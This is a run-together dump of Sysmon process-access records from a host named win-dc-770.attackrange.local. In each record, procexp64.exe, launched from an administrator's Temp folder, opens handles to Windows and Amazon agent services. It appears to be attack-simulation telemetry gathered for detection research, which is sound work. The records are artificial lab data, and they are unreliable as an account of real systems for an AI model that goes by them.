15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 